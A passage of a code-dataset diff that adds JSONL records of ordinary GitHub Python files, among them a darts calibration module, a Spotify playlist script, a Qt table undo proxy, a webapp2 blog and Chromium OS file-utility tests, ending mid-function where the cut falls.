diff --git "a/2496.jsonl" "b/2496.jsonl" new file mode 100644--- /dev/null +++ "b/2496.jsonl" @@ -0,0 +1,1179 @@ +{"seq_id":"39254531070","text":"import copy\nimport dill\nimport json\nimport pickle\nfrom collections import defaultdict\nfrom core.constants import *\nfrom core.helper import ModuleParameter\nfrom core.module import Module, Input, Output\nfrom core.datatypes import CVImage, MultiImage, \\\n CollectionTrigger, JsonObject\nimport cv2 as cv\n\n\nclass MetaDataWriter(Module):\n def __init__(self):\n super().__init__()\n self.raw_images_in = Input(data_type=MultiImage, config_keys=['cam_ids'])\n self.calibrated_images_out = Output(data_type=MultiImage, config_keys=['cam_ids'])\n self.display_images_out = Output(data_type=MultiImage, config_keys=['cam_ids'])\n self.config_in = Input(data_type=JsonObject)\n\n self.calibration_trigger_out = Output(data_type=CollectionTrigger)\n self.cam_ids = ModuleParameter(None, data_type=list)\n self.defaults = {\n 'bull_location': defaultdict(lambda: 0.5, [(0, 0.487), (1, 0.50575)]),\n 'board_radius': defaultdict(lambda: 0.26, [(0, 0.26125), (1, 0.259)]),\n 'board_surface': defaultdict(lambda: 0.3, [(0, 0.269), (1, 0.3)]),\n 'roi_start': defaultdict(lambda: 0.32, [(0, 0.3), (1, 0.31)]),\n 'roi_end': defaultdict(lambda: 0.4, [(0, 0.4), (1, 0.4)]),\n }\n\n self.roi = [50, 350, 1850, 130]\n\n def process_raw_images_in(self, raw_images: MultiImage):\n processed_images = []\n display_images = []\n for raw_image in raw_images.images:\n cam_id = raw_image.camera_info['name']\n\n # todo: save all of this somewhere\n bull_x = int(raw_image.shape[1] * getattr(self, 'bull_location_%s' % cam_id))\n board_rad = int(raw_image.shape[1] * getattr(self, 'board_radius_%s' % cam_id))\n board_surface_y = int(raw_image.shape[0] * getattr(self, 'board_surface_%s' % cam_id))\n roi_start_y = int(raw_image.shape[0] * getattr(self, 'roi_start_%s' % cam_id))\n roi_end_y = int(raw_image.shape[0] * getattr(self, 'roi_end_%s' % cam_id))\n\n c_info = raw_image.camera_info\n c_info['bull'] = bull_x\n c_info['radius'] = board_rad\n c_info['board_surface_y'] = board_surface_y\n c_info['suggested_roi'] = self.roi\n c_info['calibration'] = {param: getattr(self, '%s_%s' % (param, cam_id)) for param in self.defaults.keys()}\n\n processed_images.append(CVImage(raw_image, raw_image.id, c_info))\n display_image = copy.deepcopy(raw_image)\n # bull-line\n cv.line(display_image, (bull_x, 0), (bull_x, display_image.shape[0]), (0, 255, 0), 1)\n\n for l in [RADIUS_OUTER_DOUBLE_MM, RADIUS_INNER_DOUBLE_MM, RADIUS_INNER_TRIPLE_MM,\n RADIUS_OUTER_TRIPLE_MM, RADIUS_INNER_BULL_MM, RADIUS_OUTER_BULL_MM]:\n _x = int(board_rad * (l / RADIUS_OUTER_DOUBLE_MM))\n\n # outer-double-line left\n cv.line(display_image, (bull_x-_x, 0), (bull_x-_x, display_image.shape[0]), (255, 255, 0), 1)\n # outer-triple-line left\n cv.line(display_image, (bull_x+_x, 0), (bull_x+_x, display_image.shape[0]), (255, 255, 0), 1)\n\n cv.line(raw_image, (0, board_surface_y), (display_image.shape[1], board_surface_y), (0, 255, 0), 1)\n display_images.append(CVImage(display_image, display_image.id, c_info))\n self.calibrated_images_out.data_ready(MultiImage(processed_images, raw_images.has_processing_trigger))\n self.display_images_out.data_ready(MultiImage(display_images))\n\n def process_config_in(self, config: JsonObject):\n self.log_debug('got', config.get_dict())\n cam = list(config.get_dict().keys())[0]\n for k, v in config.get_dict()[cam].items():\n self.defaults[k][int(cam)] = v\n\n print(self.defaults)\n with open('CALIBRATION', 'wb') as conf_file:\n pickle._dump(self.defaults, conf_file)\n\n # TODO: MAYBE SET self.defaults already\n\n def __custom_pre_start__(self):\n try:\n with open('CALIBRATION', 'rb') as conf_file:\n self.defaults = pickle.load(conf_file)\n\n except Exception as e:\n print('no calibration data found')\n print(e)\n\n # TODO: WRITE data TO self.defaults\n\n for param_name in self.defaults.keys():\n for cam_id in self.cam_ids:\n if not hasattr(self, '%s_%s' % (param_name, cam_id)):\n setattr(self, '%s_%s' % (param_name, cam_id), ModuleParameter(self.defaults[param_name][cam_id]))\n\n\n","repo_name":"ffriese/darts_rec","sub_path":"processing/metadatawriter.py","file_name":"metadatawriter.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9721615648","text":"from bs4 import BeautifulSoup\nimport requests\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport os\n\nClient_ID= os.environ[\"CLIENT_ID\"]\nClient_Secret= os.environ[\"CLIENT_SECRET\"]\nDirect_Uri = os.environ[\"DIRECT_URI\"]\n\n\n###Scraping songs from Billboard###\ndate =input(\"Which year do you want to travel to? Type the date in this format YYYY-MM-DD: \")\n\nurl = f\"https://www.billboard.com/charts/hot-100/{date}/\"\nresponse = requests.get(url= url)\nwebsite = response.text\n\nsoup = BeautifulSoup(website, \"html.parser\")\nfirst_song = soup.find(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title a-no-trucate a-font-primary-bold-s u-letter-spacing-0021 u-font-size-23@tablet lrv-u-font-size-16 u-line-height-125 u-line-height-normal@mobile-max a-truncate-ellipsis u-max-width-245 u-max-width-230@tablet-only u-letter-spacing-0028@tablet\").getText()[14:].split(\"\\t\")[0]\nsong_titles = soup.find_all(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title a-no-trucate a-font-primary-bold-s u-letter-spacing-0021 lrv-u-font-size-18@tablet lrv-u-font-size-16 u-line-height-125 u-line-height-normal@mobile-max a-truncate-ellipsis u-max-width-330 u-max-width-230@tablet-only\")\nsongs_list= [song.getText()[14:].split(\"\\t\")[0] for song in song_titles]\nsongs_list.insert(0,first_song)\n\nprint(songs_list)\n\nwith open(\"song_playlist.txt\",\"w\") as file:\n for song in songs_list:\n file.write(f\"{song}\\n\")\n\n###Authorization on Spotify####\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=Client_ID,\n client_secret=Client_Secret,\n redirect_uri=Direct_Uri,\n scope= \"playlist-modify-private\",\n show_dialog= True,\n cache_path=\"token.txt\"))\n\nuser_id =sp.current_user()[\"id\"]\n\n###Search for songs on Spotify####\n\nuri_song =[]\nfor song in songs_list:\n try:\n response = sp.search(q=f\"{song}\", type=\"track\",limit=1)\n uri_song.append(response[\"tracks\"][\"items\"][0][\"uri\"])\n except IndexError:\n print(f\"Song {song} not found on Spotify\")\n\n\n\n\nprint(uri_song)\n\n###Add songs to playlist###\n\nmy_playlist = sp.user_playlist_create(user=user_id,\n name=f\"{date} Billboard top 100\",\n public=False)\nmy_playlist_id=my_playlist[\"id\"]\n\n\nsp.user_playlist_add_tracks(user=user_id,\n playlist_id=my_playlist_id,\n tracks=uri_song)\n\n\n","repo_name":"LinhHoang2812/Spotif-timemachine-playlist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2160679319","text":"'''\nThis is an argmax function, taking an array as an argument\noutputs the element of max value, if the array contains multiple\nof the same max value, our function select one index randomly\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nExample:\n\nGiven a list of example_list = [1, 2, 3, 3]\nargmax(example_list) will output index 2 and index 3 with same probability\n\n\n\n'''\n\n# import in numpy\nimport numpy as np\n\n\n# let's start our function\ndef argmax(q_values):\n \"\"\"\n Takes in a list of q_values and returns the index of the item \n with the highest value. Breaks ties randomly.\n returns: int - the index of the highest value in q_values\n\n \"\"\"\n\n # to start we set the top_value as negative infinity\n top_value = float(\"-inf\")\n\n # creat a list of empty elements to store ties\n ties = []\n\n # now, let's loop through our argument q_values\n for i in range(len(q_values)):\n\n # compare the current element with our top_value, if it's higher:\n if q_values[i] > top_value:\n\n # store the q_value as the new top value\n top_value = q_values[i]\n\n # clear tie list\n ties.clear()\n\n # put the index of our new top_value in our tie list\n ties.append(i)\n\n # if the current element is same as our top_value:\n if q_values[i] == top_value:\n\n # store the index of current value in our ties list\n ties.append(i)\n\n # return the top_value stored in tie, or randomly pick in our ties\n return np.random.choice(ties)\n","repo_name":"bosgithub/Fundamentals_of_Reinforcements_Learning","sub_path":"argmax_function.py","file_name":"argmax_function.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27811940787","text":"from qt import QObject, PYSIGNAL\n\n__all__ = ['getProxy']\n\nclass UndoStack:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._stack = []\n self._top = -1\n self._limit = -1\n \n def prev(self):\n if self._top >= 0:\n r = self._stack[self._top]\n self._top -= 1\n return r\n else:\n return None\n\n def next(self):\n if self._limit > self._top:\n self._top += 1\n return self._stack[self._top]\n else:\n return None\n \n def push(self, *args):\n self._top += 1\n if len(self._stack) == self._top:\n self._stack.append(args)\n else:\n self._stack[self._top] = args\n self._limit = self._top\n if self._limit >= 2000:\n del self._stack[0]\n self._limit -= 1\n self._top -= 1\n\n def status(self):\n return self._top+1, self._limit-self._top\n \nclass _TableRowProxy(object):\n \"\"\"\n self.num is a row index in the table\n \"\"\"\n def __setitem__(self,i,v):\n if type(i) == str:\n i = self.getColumnIndex(i)\n w = self[i]\n super(self.__class__,self).__setitem__(i,v)\n self.tab.emitter.emit(PYSIGNAL(\"cellChanged\"),(self.num,i,self.data[i],w))\n if not self.tab.undoStackReadOnly:\n self.tab.undoStack.push(\"cellChanged\",(self.num,i),(v,w))\n\n def select(self):\n self.tab.select(self.num)\n \nclass _TableModelProxy(object):\n def __init__(self, *args):\n self.super = super(self.__class__,self)\n self.super.__init__(*args)\n self.emitter = QObject()\n self.selection = None\n self.undoStack = UndoStack()\n self.undoStackReadOnly = False\n \n def setHeader(self, col, header):\n self.super.setHeader(col, header)\n self.emitter.emit(PYSIGNAL(\"setHeader\"),(col,header))\n \n def insertRow(self,i=None,row=None):\n if i is None: i=len(self.table)\n if self.super.insertRow(i,row):\n for k in range(i,len(self.table)):\n self.table[k].num = k\n self.emitter.emit(PYSIGNAL(\"insertRow\"),(i,self.table[i]))\n if not self.undoStackReadOnly:\n self.undoStack.push(\"insertRow\",i,row)\n return True\n else:\n return False\n \n def insertColumn(self,i=None,col=None):\n if self.super.insertColumn(i,col):\n self.emitter.emit(PYSIGNAL(\"insertColumn\"),(i,col))\n if type(i)==int and i <= self.selection:\n self.selection += 1\n return True\n else:\n return False\n \n def takeRow(self,i):\n r = self.super.takeRow(i)\n for k in range(i,len(self.table)):\n self.table[k].num = k\n if i == self.selection:\n self.selection = None\n self.emitter.emit(PYSIGNAL(\"takeRow\"),(i,r))\n if not self.undoStackReadOnly:\n self.undoStack.push(\"takeRow\",i,r)\n return r\n \n def takeColumn(self,i):\n c = self.super.takeColumn(i)\n self.emitter.emit(PYSIGNAL(\"takeColumn\"),(i,))\n if i == self.selection:\n self.selection = None\n elif i < self.selection:\n self.selection -= 1\n return c\n \n def sort(self, *args):\n self.super.sort(*args)\n for i,row in enumerate(self.table):\n row.num = i\n self.emitter.emit(PYSIGNAL(\"sort\"),())\n\n def select(self, sel):\n self.selection = sel\n self.emitter.emit(PYSIGNAL(\"select\"),(sel,))\n\n def getSelection(self):\n return self.selection\n\n def resetUndoStack(self):\n self.undoStack.reset()\n \n def undo(self, n=1):\n for m in range(n):\n try:\n op, arg1, arg2 = self.undoStack.prev()\n #print \"undo\", op, arg1, arg2\n #print len(self.undoStack._stack)\n except TypeError:\n break\n self.undoStackReadOnly = True\n if op == 'insertRow':\n self.takeRow(arg1)\n elif op == 'takeRow':\n self.insertRow(arg1,arg2)\n elif op == 'cellChanged':\n i, j = arg1\n v, w = arg2\n self[i][j] = w\n self.undoStackReadOnly = False\n \n def redo(self, n=1):\n for m in range(n):\n try:\n op, arg1, arg2 = self.undoStack.next()\n #print \"redo\", op, arg1, arg2\n #print len(self.undoStack._stack)\n except TypeError:\n break\n self.undoStackReadOnly = True\n if op == 'insertRow':\n self.insertRow(arg1,arg2)\n elif op == 'takeRow':\n self.takeRow(arg1)\n elif op == 'cellChanged':\n i, j = arg1\n v, w = arg2\n self[i][j] = v\n self.undoStackReadOnly = False\n\n def undoStackStatus(self):\n return self.undoStack.status()\n \ndef getProxy(cls):\n name = \"Proxy_TableRow\"\n bases = (cls.TableRow,) + _TableRowProxy.__bases__\n dic = dict(_TableRowProxy.__dict__)\n rowModelClass = type(name, bases, dic)\n \n name = \"Proxy_\" + cls.__name__\n bases = (cls,) + _TableModelProxy.__bases__\n dic = dict(_TableModelProxy.__dict__)\n dic['TableRow'] = rowModelClass\n \n return type(name, bases, dic)\n\n","repo_name":"nltk/nltk_contrib","sub_path":"nltk_contrib/lpath/at_lite/tableproxy.py","file_name":"tableproxy.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"52"} +{"seq_id":"13096726193","text":"#!/usr/bin/env python\nimport os\nimport webapp2\nimport jinja2\nimport time\n#import logging\n\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\nclass Handler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.write(*a, **kw)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self,template, **kw):\n self.write(self.render_str(template, **kw))\n\n\nclass Entry(db.Model): #represents submission from user\n title = db.StringProperty(required = True) #define types of this entity\n content = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n\n\nclass MainHandler(Handler):\n def get(self):\n self.redirect('/blog')\n\n#####blog stuff\n\nclass MainBlog(Handler): #main front page\n def render_front_page(self,title=\"\", content=\"\"):\n contents = db.GqlQuery(\"SELECT * from Entry ORDER BY created DESC \")#run a query\n self.render(\"front.html\", title= title, content=content, contents=contents )\n\n def get(self):\n self.render_front_page()\n\n def post(self):\n title = self.request.get(\"title\")\n content = self.request.get(\"content\")\n self.response.write(title, content)\n\n\nclass Newpost(Handler): #new post page\n def render_newpostform(self, title=\"\",content= \"\",error=\"\"): #passing \"\" into template\n self.render(\"newpost.html\", title=title, content=content, error=error) #render it from templates\n\n def get(self):\n self.render_newpostform()\n\n def post(self):\n title = self.request.get(\"title\") #creating variables\n content = self.request.get(\"content\")\n\n if title and content: #creates a new instance of Content, called a\n a = Entry(title=title, content=content)\n a.put() #stores new Entry object in database\n time.sleep(1) #Nick's solution to not have to refresh\n new_route = \"/blog/\" + str(a.key().id()) #comes later\n self.redirect(new_route)\n\n else:\n error = \"We need both a title and some content\"\n self.render_newpostform(title, content, error) #pass in from line 23-24\n\n\nclass ViewPostHandler(webapp2.RequestHandler): #what's the purpose of this class?\n def get(self, id):\n blog_id = Entry.get_by_id(int(id)) #get_by_id of user input, query of database, find it by id\n # logging.info(\"test\")\n # logging.info(title)\n if blog_id == None: #find blog_id; if not there, return error\n error = \"No post associated with id.\"\n self.response.write(error)\n else:\n self.response.write(blog_id.title)\n self.response.write(\"

\")\n self.response.write(blog_id.content)\n\n #add something with blog_id\n # def single_new_post(self, title=\"\",content=\"\"):\n # self.render(\"single_new_post.html\", title=title, content=content)\n # self.single_new_post()\n #\n # def post(self):\n # title = self.request.get(\"title\")\n # content = self.request.get(\"content\")\n # self.response.write(title, content)\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler), #redirects to mainpage\n ('/blog', MainBlog),\n ('/newpost',Newpost),\n webapp2.Route('/blog/', ViewPostHandler) #says our route expects URLpath that starts\n], debug=True) #with /blog/ & ends with one or more digits\n","repo_name":"leem94/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18532936431","text":"import argparse\nfrom collections import namedtuple\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils.bio import parse_cigar\nfrom utils.os_utils import expandpath, smart_makedirs\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\")\n parser.add_argument(\"-o\", \"--output\")\n parser.add_argument(\"--asm1-name\", default=\"\")\n parser.add_argument(\"--asm2-name\", default=\"\")\n parser.add_argument(\"--legend\", default=\"\")\n parser.add_argument(\"--title\", default=\"\")\n params = parser.parse_args()\n\n\n for input_file in params.input.split(','):\n cx, cy = 0, 0\n x, y = [cx], [cy]\n with open(input_file) as f:\n parsed_cigar, cnt = parse_cigar(f.readline())\n print(cnt)\n for len, mode in parsed_cigar:\n len = int(len)\n if mode == 'M' or mode == 'X' or mode == '=':\n cx += len\n cy += len\n elif mode == 'I':\n cy += len\n elif mode == 'D':\n cx += len\n\n x.append(cx / 1e6)\n y.append(cy / 1e6)\n\n plt.plot(x, y)\n\n if params.legend:\n plt.legend(params.legend.split(','))\n plt.xlabel(params.asm1_name)\n plt.ylabel(params.asm2_name)\n plt.title(params.title)\n plt.axis('square')\n plt.savefig(os.path.join(params.output, 'cigar.pdf'), format='pdf')\n\nmain()","repo_name":"seryrzu/unialigner","sub_path":"tandem_aligner/py/visualize_cigar.py","file_name":"visualize_cigar.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"12537346245","text":"from __future__ import print_function\n\nimport os\nimport shutil\n\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import osutils\nfrom chromite.lib.paygen import filelib\nfrom chromite.lib.paygen import utils\n\n\nclass TestFileManipulation(cros_test_lib.TestCase):\n \"\"\"Test cases for filelib.\"\"\"\n\n FILE1 = 'file1a'\n FILE2 = 'file2'\n SUBDIR = 'subdir'\n SUBFILE = '%s/file1b' % SUBDIR\n FILE_GLOB = 'file1*'\n\n FILE1_CONTENTS = 'Howdy doody there dandy'\n FILE2_CONTENTS = 'Once upon a time in a galaxy far far away.'\n SUBFILE_CONTENTS = 'Five little monkeys jumped on the bed.'\n\n def _SetUpTempdir(self, tempdir):\n with open(os.path.join(tempdir, self.FILE1), 'w') as out1:\n out1.write(self.FILE1_CONTENTS)\n\n with open(os.path.join(tempdir, self.FILE2), 'w') as out2:\n out2.write(self.FILE2_CONTENTS)\n\n subdir = os.path.join(tempdir, self.SUBDIR)\n osutils.SafeMakedirs(subdir)\n\n with open(os.path.join(tempdir, self.SUBFILE), 'w') as out3:\n out3.write(self.SUBFILE_CONTENTS)\n\n def testIntegrationScript(self):\n dir1 = None\n dir2 = None\n try:\n dir1 = utils.CreateTmpDir('filelib_unittest1-')\n dir2 = utils.CreateTmpDir('filelib_unittest2-')\n\n self._SetUpTempdir(dir1)\n\n dir1_file1 = os.path.join(dir1, self.FILE1)\n dir1_file2 = os.path.join(dir1, self.FILE2)\n dir1_subfile = os.path.join(dir1, self.SUBFILE)\n dir1_top_files = [dir1_file1, dir1_file2]\n dir1_deep_files = dir1_top_files + [dir1_subfile]\n\n dir2_file1 = os.path.join(dir2, self.FILE1)\n dir2_file2 = os.path.join(dir2, self.FILE2)\n dir2_subdir = os.path.join(dir2, self.SUBDIR)\n dir2_subfile = os.path.join(dir2, self.SUBFILE)\n dir2_top_files = [dir2_file1, dir2_file2]\n dir2_deep_files = dir2_top_files + [dir2_subfile]\n\n # Test Exists.\n for dir1_path in dir1_deep_files:\n self.assertTrue(filelib.Exists(dir1_path))\n for dir2_path in dir2_deep_files:\n self.assertFalse(filelib.Exists(dir2_path))\n\n # Test ListFiles with various options.\n self.assertEqual(set(dir1_top_files),\n set(filelib.ListFiles(dir1)))\n self.assertEqual(set(dir1_deep_files),\n set(filelib.ListFiles(dir1, recurse=True)))\n self.assertEqual(sorted(dir1_deep_files),\n filelib.ListFiles(dir1, recurse=True, sort=True))\n self.assertEqual(set([dir1_file1, dir1_subfile]),\n set(filelib.ListFiles(dir1, recurse=True,\n filepattern=self.FILE_GLOB)))\n # Test CopyFiles from dir1 to dir2.\n self.assertEqual(set(dir2_deep_files),\n set(filelib.CopyFiles(dir1, dir2)))\n for dir2_path in dir2_deep_files:\n self.assertTrue(filelib.Exists(dir2_path))\n\n # Test Cmp.\n self.assertTrue(filelib.Cmp(dir1_file1, dir2_file1))\n self.assertTrue(filelib.Cmp(dir2_file2, dir1_file2))\n self.assertFalse(filelib.Cmp(dir1_file2, dir2_file1))\n\n # Test RemoveDirContents.\n filelib.RemoveDirContents(dir2_subdir)\n self.assertTrue(filelib.Exists(dir2_subdir, as_dir=True))\n self.assertFalse(filelib.Exists(dir2_subfile))\n filelib.RemoveDirContents(dir2)\n self.assertTrue(filelib.Exists(dir2, as_dir=True))\n for dir2_path in dir2_deep_files:\n self.assertFalse(filelib.Exists(dir2_path))\n\n filelib.RemoveDirContents(dir1)\n self.assertTrue(filelib.Exists(dir1, as_dir=True))\n for dir1_path in dir1_deep_files:\n self.assertFalse(filelib.Exists(dir1_path))\n\n finally:\n for d in (dir1, dir2):\n if d and os.path.isdir(d):\n shutil.rmtree(d)\n\n\nclass TestFileLib(cros_test_lib.MoxTempDirTestCase):\n \"\"\"Test filelib module.\n\n Note: We use tools for hashes to avoid relying on hashlib since that's what\n the filelib module uses. We want to verify things rather than have a single\n hashlib bug break both the code and the tests.\n \"\"\"\n\n def _MD5Sum(self, file_path):\n \"\"\"Use RunCommand to get the md5sum of a file.\"\"\"\n return cros_build_lib.RunCommand(\n ['md5sum', file_path], redirect_stdout=True).output.split(' ')[0]\n\n def _SHA1Sum(self, file_path):\n \"\"\"Use sha1sum utility to get SHA1 of a file.\"\"\"\n # The sha1sum utility gives SHA1 in base 16 encoding. We need base 64.\n hash16 = cros_build_lib.RunCommand(\n ['sha1sum', file_path], redirect_stdout=True).output.split(' ')[0]\n return hash16.decode('hex').encode('base64').rstrip()\n\n def _SHA256Sum(self, file_path):\n \"\"\"Use sha256 utility to get SHA256 of a file.\"\"\"\n # The sha256sum utility gives SHA256 in base 16 encoding. We need base 64.\n hash16 = cros_build_lib.RunCommand(\n ['sha256sum', file_path], redirect_stdout=True).output.split(' ')[0]\n return hash16.decode('hex').encode('base64').rstrip()\n\n def testMD5Sum(self):\n \"\"\"Test MD5Sum output with the /usr/bin/md5sum binary.\"\"\"\n file_path = os.path.abspath(__file__)\n self.assertEqual(self._MD5Sum(file_path), filelib.MD5Sum(file_path))\n\n def testShaSums(self):\n file_path = os.path.abspath(__file__)\n expected_sha1 = self._SHA1Sum(file_path)\n expected_sha256 = self._SHA256Sum(file_path)\n sha1, sha256 = filelib.ShaSums(file_path)\n self.assertEqual(expected_sha1, sha1)\n self.assertEqual(expected_sha256, sha256)\n\n def testCmp(self):\n path1 = '/some/local/path'\n path2 = '/other/local/path'\n\n self.mox.StubOutWithMock(filelib.os.path, 'exists')\n self.mox.StubOutWithMock(filelib.filecmp, 'cmp')\n\n # Set up the test replay script.\n # Run 1, both exist, are different.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(True)\n filelib.filecmp.cmp(path1, path2).AndReturn(True)\n # Run 2, both exist, are different.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(True)\n filelib.filecmp.cmp(path1, path2).AndReturn(False)\n # Run 3, second file missing.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(False)\n self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertTrue(filelib.Cmp(path1, path2))\n self.assertFalse(filelib.Cmp(path1, path2))\n self.assertFalse(filelib.Cmp(path1, path2))\n self.mox.VerifyAll()\n\n def testCopy(self):\n path1 = '/some/local/path'\n path2 = '/other/local/path'\n relative_path = 'relative.bin'\n\n self.mox.StubOutWithMock(filelib, 'Exists')\n self.mox.StubOutWithMock(osutils, 'SafeMakedirs')\n self.mox.StubOutWithMock(filelib.shutil, 'copy2')\n\n # Set up the test replay script.\n # Run 1, path2 directory exists.\n filelib.Exists(os.path.dirname(path2), as_dir=True).AndReturn(True)\n filelib.shutil.copy2(path1, path2)\n # Run 2, path2 directory does not exist.\n filelib.Exists(os.path.dirname(path2), as_dir=True).AndReturn(False)\n osutils.SafeMakedirs(os.path.dirname(path2))\n filelib.shutil.copy2(path1, path2)\n\n # Run 3, there is target directory is '.', don't test existence.\n filelib.shutil.copy2(path1, relative_path)\n self.mox.ReplayAll()\n\n # Run the test verifications, three times.\n filelib.Copy(path1, path2)\n filelib.Copy(path1, path2)\n filelib.Copy(path1, relative_path)\n self.mox.VerifyAll()\n\n def testSize(self):\n path = '/some/local/path'\n size = 100\n\n self.mox.StubOutWithMock(filelib.os.path, 'isfile')\n self.mox.StubOutWithMock(filelib.os, 'stat')\n\n # Set up the test replay script.\n # Run 1, success.\n filelib.os.path.isfile(path).AndReturn(True)\n filelib.os.stat(path).AndReturn(cros_test_lib.EasyAttr(st_size=size))\n # Run 2, file not found.\n filelib.os.path.isfile(path).AndReturn(False)\n self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertEqual(size, filelib.Size(path))\n self.assertRaises(filelib.MissingFileError, filelib.Size, path)\n self.mox.VerifyAll()\n\n def testExists(self):\n path = '/some/local/path'\n result = 'TheResult'\n\n self.mox.StubOutWithMock(filelib.os.path, 'isdir')\n self.mox.StubOutWithMock(filelib.os.path, 'isfile')\n\n # Set up the test replay script.\n # Run 1, as file.\n filelib.os.path.isfile(path).AndReturn(result)\n # Run 2, as dir.\n filelib.os.path.isdir(path).AndReturn(result)\n self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertEqual(result, filelib.Exists(path))\n self.assertEqual(result, filelib.Exists(path, as_dir=True))\n self.mox.VerifyAll()\n\n def _CreateSimpleFile(self, *args):\n contents = 'Not important, can be anything'\n for path in args:\n with open(path, 'w') as out:\n out.write(contents)\n\n def testRemove(self):\n # pylint: disable=E1101\n path1 = os.path.join(self.tempdir, 'file1')\n path2 = os.path.join(self.tempdir, 'file2')\n missing_path = os.path.join(self.tempdir, 'missing')\n subdir = os.path.join(self.tempdir, 'subdir')\n subpath1 = os.path.join(subdir, 'file3')\n subpath2 = os.path.join(subdir, 'file4')\n\n # Test remove on path that does not exist.\n self.assertRaises(filelib.MissingFileError, filelib.Remove, path1)\n self.assertFalse(filelib.Remove(path1, ignore_no_match=True))\n\n # Test remove on simple file.\n self._CreateSimpleFile(path1)\n self.assertTrue(filelib.Remove(path1))\n self.assertRaises(filelib.MissingFileError, filelib.Remove, path1)\n self.assertFalse(filelib.Remove(path1, ignore_no_match=True))\n\n # Test remove on more than one file.\n self._CreateSimpleFile(path1, path2)\n self.assertTrue(filelib.Remove(path1, path2))\n\n # Test remove on multiple files, with one missing.\n self._CreateSimpleFile(path1, path2)\n self.assertRaises(filelib.MissingFileError, filelib.Remove,\n path1, missing_path, path2)\n # First path1 removed, but path2 not because it was after missing.\n self.assertFalse(filelib.Exists(path1))\n self.assertTrue(filelib.Exists(path2))\n\n # Test remove multiple files, one missing, with ignore_no_match True.\n self._CreateSimpleFile(path1, path2)\n self.assertFalse(filelib.Remove(path1, missing_path, path2,\n ignore_no_match=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(path2))\n\n # Test recursive Remove.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertTrue(filelib.Remove(path1, path2, subdir, recurse=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(subpath1))\n\n # Test recursive Remove with one missing path.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertRaises(filelib.MissingFileError, filelib.Remove,\n path1, subdir, missing_path, path2, recurse=True)\n self.assertFalse(filelib.Exists(path1))\n self.assertTrue(filelib.Exists(path2))\n self.assertFalse(filelib.Exists(subpath1))\n\n # Test recursive Remove with one missing path and ignore_no_match True.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertFalse(filelib.Remove(path1, subdir, missing_path, path2,\n recurse=True, ignore_no_match=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(path2))\n self.assertFalse(filelib.Exists(subpath1))\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/lib/paygen/filelib_unittest.py","file_name":"filelib_unittest.py","file_ext":"py","file_size_in_byte":11485,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"32593615026","text":"import logging\nimport os\nfrom datetime import datetime\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom time import time\n\nFOLDER = 'logs'\n\ndef setup_logger(level):\n logger = logging.getLogger('default')\n logger.setLevel(level)\n _log_format = f\"[%(levelname)s] %(filename)s %(funcName)s(%(lineno)d): %(message)s\"\n Path.mkdir(Path(FOLDER), exist_ok=True)\n logname = f'logs/log_{datetime.now().strftime(\"%d,%m,%Y_%H;%M;%S\")}.txt'\n handler = logging.FileHandler(logname, mode='w')\n handler.setFormatter(logging.Formatter(_log_format))\n logger.addHandler(handler)\n return logger\n\nlogger = setup_logger(logging.DEBUG)\n\n\ndef cleanup_old_logs(dir=None):\n folder = dir or Path(FOLDER)\n if not Path.exists(folder):\n return\n for log in Path.iterdir(folder):\n if time() - log.stat().st_mtime > timedelta(days=30).total_seconds():\n 